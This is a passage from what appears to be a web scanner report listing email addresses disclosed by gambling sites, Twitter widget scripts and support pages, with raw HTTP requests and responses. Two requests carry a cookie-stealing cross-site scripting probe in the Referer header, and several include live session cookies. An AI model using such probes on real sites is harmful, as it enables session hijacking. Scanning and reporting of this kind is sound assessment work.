<a class="popupwindow" href="http://content.scratch.co.uk/ContactUsMail.aspx?popup=1">support@scratch.co.uk</a>
...[SNIP]...

21.26. http://scratch.co.uk/help/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/help/privacy/

Issue detail

The following email address was disclosed in the response:

support@scratch.co.uk

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

21.27. http://scratch.co.uk/problem-gambling/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/problem-gambling/

Issue detail

The following email address was disclosed in the response:

care@scratch.co.uk

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

21.28. http://scratch.co.uk/vis-club/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/vis-club/

Issue detail

The following email address was disclosed in the response:

vip@scratch.co.uk

Request

GET /vis-club/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

21.29. http://trk.primescratchcards.com/w3c/p3p.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trk.primescratchcards.com
Path:	/w3c/p3p.xml

Issue detail

The following email address was disclosed in the response:

support@primegaming.com

Request

GET /w3c/p3p.xml HTTP/1.1
Host: trk.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDQQBCDAQB=BJEGLCIAEIAOPPLGIKGGAJPK;

Response

HTTP/1.1 200 OK
Content-Length: 1262
Content-Type: text/xml
Last-Modified: Wed, 02 Sep 2009 12:12:30 GMT
Accept-Ranges: bytes
ETag: "ec6bd1a4c62bca1:1bca"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:41 GMT
Connection: close

<META xmlns="http://www.w3.org/2002/01/P3Pv1"><POLICY-REFERENCES><EXPIRY max-age="86400"/><POLICY-REF about="#privacy1"><INCLUDE>/*</INCLUDE><COOKIE-INCLUDE name="*" value="*" domain="*" path="*"/></P
...[SNIP]...
<DATA ref="#business.contact-info.online.email">support@primegaming.com</DATA>
...[SNIP]...

21.30. http://widgets.twimg.com/j/2/widget.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.twimg.com
Path:	/j/2/widget.css

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /j/2/widget.css HTTP/1.1
Host: widgets.twimg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1

Response

HTTP/1.0 200 OK
x-amz-id-2: yFPEo7/5CTnxmKnUEjXU1/OmPGPsNh0IMRRhNdN4WTdj8fNE1ntiR92x6Uowmhmg
x-amz-request-id: DD5E22500AC48FB0
Date: Sun, 08 May 2011 02:35:35 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:13 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 728178
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 781b08720daee608100b86b9caa21fe538f20b06be5da6738553668be3dd6d454b31c00869f5f7f7
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 45578d14a69df96accaab0d1aba82a5a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

21.31. http://widgets.twimg.com/j/2/widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.twimg.com
Path:	/j/2/widget.js

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1

Response

HTTP/1.0 200 OK
x-amz-id-2: /PA731toNx972OXjAmpMncbSDYG7pU/61LXV/1IwSSaURoBa3/0W99IUiTyaOKij
x-amz-request-id: 1F8F72FFC4060381
Date: Fri, 06 May 2011 15:21:09 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 27009
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 22dee5c2ac7e1480fffa417aaa38dacca8ef672fcee8d5cb4808d2ed41642b8cf488a527a8e435fe
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 45578d14a69df96accaab0d1aba82a5a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

21.32. http://www.bet365.com/home/js/FlashDetection_vA009cr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/home/js/FlashDetection_vA009cr.js

Issue detail

The following email addresses were disclosed in the response:

support-dan@customerservices365.com
support-ger@customerservices365.com
support-ita@customerservices365.com
support-nor@customerservices365.com
support-sch@customerservices365.com
support-spa@customerservices365.com
support-swe@customerservices365.com
support-tch@customerservices365.com
support@customerservices365.com

Request

GET /home/js/FlashDetection_vA009cr.js HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
Referer: http://www.bet365.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; aps03=ct=198&lng=1

Response

HTTP/1.1 200 OK
Age: 450918
Date: Mon, 16 May 2011 10:25:41 GMT
Cache-Control: private
Connection: Keep-Alive
Via: L016
ETag: "8053fb46b981cb1:608b"
Cteonnt-Length: 8450
Content-Type: application/x-javascript
Last-Modified: Thu, 11 Nov 2010 15:58:27 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Content-Length: 8450

function FL_resizeFlashDiv(height,$a,$b){var $c='';if((typeof $b!=='undefined')&&($b!==null)){$c=(Number($b)==1)?'Highlights':(Number($b)==2)?'Next3RacesApp':(Number($b)==3)?'Financials':$a;};if(heigh
...[SNIP]...
on=no,menubar=no,status=no,toolbar=no,width=400,height=275');};function FL_OthersAvailable($F,$G,$H){if(ChckUserLoged()){var $I=$F.split("-");var $J="Others On Request";var $K="";switch($H){case 1:$K="support@customerservices365.com";break;case 2:$K="support-tch@customerservices365.com";break;case 3:$K="support-spa@customerservices365.com";break;case 4:$K="support@customerservices365.com";break;case 5:$K="support-ger@customerservices365.com";break;case 6:$K="support-ita@customerservices365.com";break;case 7:$K="support-dan@customerservices365.com";break;case 8:$K="support-swe@customerservices365.com";break;case 9:$K="support-nor@customerservices365.com";break;case 10:$K="support-sch@customerservices365.com";break;case 14:$K="support@customerservices365.com";break;};window.location="mailto:"+$K+"?subject="+$J+"&body=Username: "+$G+"; www.bet365.com/home/default.asp?deeplink=oor%26cid="+$I[4]+"%26c1i="+$I[0]+"%26c1t="+$I[1]+"%26c2i="+$I[2]+"%26c2t="+$I[3]
...[SNIP]...

21.33. http://www.bet365.com/home/js/Navigation_vA081cr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bet365.com
Path:	/home/js/Navigation_vA081cr.js

Issue detail

The following email address was disclosed in the response:

customerservices@bet365usa.com

Request

GET /home/js/Navigation_vA081cr.js HTTP/1.1
Host: www.bet365.com
Proxy-Connection: keep-alive
Referer: http://www.bet365.com/en/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; aps03=ct=198&lng=1

Response

HTTP/1.1 200 OK
Age: 20302
Date: Mon, 16 May 2011 11:37:26 GMT
Cache-Control: private
Connection: Keep-Alive
Via: L016
ETag: "06a19bb71ecc1:6c91"
Cteonnt-Length: 149211
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 17:51:32 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Content-Length: 149211

var DocLoaded=0;var DoSubmitForm=0;var lgm=null;var WhichDiv;var TrackOpenClose='';var maxCoupons=8;var silksNotSet=false;var resultsPageId=6000;var m_blnBetSlip=false;var reqFlashVersion=7;var g_Re
...[SNIP]...
ookieTest();var $0g="status=no,toolbar=no,menubar=no,resizable=yes,location=yes,alwaysRaised=yes";var $0e="https://www.paypal.com/cgi-bin/webscr?cmd=_ext-enter&redirect_cmd=_xclick";var $0h="&business=customerservices@bet365usa.com&item_name=Bet365 Deposit&no_note=1&no_shipping=1";var $0i="&amount="+document.all.txtDeposit.value;var w=window.open(($0e+$0h+$0i),"bet365popup",$0g);snp(2260);SubmitForm();};function scorecastUpdateO
...[SNIP]...

21.34. https://www.betsson.com/en/customer-service/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/

Issue detail

The following email address was disclosed in the response:

responsiblegaming@betsson.com

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.35. https://www.betsson.com/en/customer-service/responsible-gaming/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/responsible-gaming/

Issue detail

The following email addresses were disclosed in the response:

help@gordonhouse.org.uk
info@gamcare.org.uk
responsiblegaming@betsson.com
webmaster@gamblingtherapy.org

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.36. https://www.betsson.com/en/customer-service/terms/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/terms/index.asp

Issue detail

The following email addresses were disclosed in the response:

complaints@lga.org.mt
support@betsson.com

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.37. http://www.bigmoneyscratch.com/Affiliates.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Affiliates.aspx

Issue detail

The following email address was disclosed in the response:

affiliates@BigMoneyScratch.com

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

21.38. http://www.gamblersanonymous.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamblersanonymous.org
Path:	/

Issue detail

The following email address was disclosed in the response:

isomain@gamblersanonymous.org

Request

GET / HTTP/1.1
Host: www.gamblersanonymous.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:18:24 GMT
Server: Apache
Last-Modified: Thu, 01 Apr 2010 20:42:43 GMT
Accept-Ranges: bytes
Content-Length: 2949
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<TITLE>Gamblers Anonymous Official Home Page</TITLE></HEAD>
<BODY BACKGROUND="images/bkgrnd.gif">
<CENTER>
<TABLE BORDER="0" CELLPADDING="4
...[SNIP]...
<A
HREF="mailto:isomain@gamblersanonymous.org">
...[SNIP]...
<FONT SIZE="+1">isomain@gamblersanonymous.org</FONT>
...[SNIP]...

21.39. http://www.gx4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gx4.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@gx4.com

Request

GET / HTTP/1.1
Host: www.gx4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Apache
Last-Modified: Fri, 05 Feb 2010 11:54:30 GMT
ETag: "34e8030-17e7-1d372980"
Accept-Ranges: bytes
Content-Length: 6119
Connection: close
Content-Type: text/html; charset=ISO-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>G4,
...[SNIP]...
<a href="mailto:info@gx4.com?subject=Newsletter subscription">
...[SNIP]...

21.40. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The following email address was disclosed in the response:

lokesh.dhakar@gmail.com

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:12:16 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

21.41. http://www.lga.org.mt/lga/content.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lga.org.mt
Path:	/lga/content.aspx

Issue detail

The following email address was disclosed in the response:

info@lga.org.mt

Request

GET /lga/content.aspx?id=109045 HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.42. http://www.lga.org.mt/lga/home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lga.org.mt
Path:	/lga/home.aspx

Issue detail

The following email address was disclosed in the response:

info@lga.org.mt

Request

GET /lga/home.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.43. http://www.neogames.com/careers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/careers

Issue detail

The following email addresses were disclosed in the response:

jobs@neogames.com
recruitment@neogames.com

Request

GET /careers HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 6918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:jobs@neogames.com">recruitment@neogames.com</a>
...[SNIP]...

21.44. http://www.neogames.com/contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/contact-us

Issue detail

The following email addresses were disclosed in the response:

info@neogames.com
recruitment@neogames.com
sales@neogames.com
support@neogames.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...
<a href="mailto:support@neogames.com">support@neogames.com</a>
...[SNIP]...
<a href="mailto:recruitment@neogames.com">recruitment@neogames.com</a>
...[SNIP]...
<a href="mailto:info@neogames.com">info@neogames.com</a>
...[SNIP]...

21.45. http://www.neogames.com/corporate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/corporate

Issue detail

The following email address was disclosed in the response:

sales@neogames.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...

21.46. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neogames.com
Path:	/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

Issue detail

The following email address was disclosed in the response:

sales@neogames.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
<a href="mailto:sales@neogames.com">sales@neogames.com</a>
...[SNIP]...

21.47. https://www.norskelodd.com/no/FAQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/FAQ

Issue detail

The following email address was disclosed in the response:

support@norskelodd.com

Request

GET /no/FAQ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

21.48. https://www.norskelodd.com/no/charity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/no/charity/

Issue detail

The following email address was disclosed in the response:

charity@norskelodd.com

Request

GET /no/charity/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

21.49. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.50. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs/PrivacyPolicy.htm

Issue detail

The following email address was disclosed in the response:

info@postcodelottery.com

Request

Response

21.51. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs/TermsAndConditions.htm

Issue detail

The following email address was disclosed in the response:

info@postcodelottery.com

Request

Response

21.52. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The following email address was disclosed in the response:

Support@pclscratch.com

Request

Response

21.53. http://www.primegrattage.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primegrattage.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

author@TechSystems.com
management@portaldepot.net
support@primegrattage.com

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CUR OUR PUB NOR UNI CNT"
X-Powered-By: ASP.NET
Content-Length: 27400
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=NDANCHNDBOKGLAFOAPEGFKFJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:support@primegrattage.com">support@primegrattage.com</a>
...[SNIP]...
<!--
/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var sc
...[SNIP]...

21.54. http://www.primescratchcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

author@TechSystems.com
management@portaldepot.net
support@primescratchcards.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:40:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29955
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OHLOLGNDBFFPCKPGPEBMNJLJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<!--
/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var sc
...[SNIP]...

21.55. http://www.primescratchcards.com/HelpDepositMethods.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/HelpDepositMethods.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

21.56. http://www.primescratchcards.com/InviteFriend.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/InviteFriend.asp

Issue detail

The following email address was disclosed in the response:

support@primescratchcards.com

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
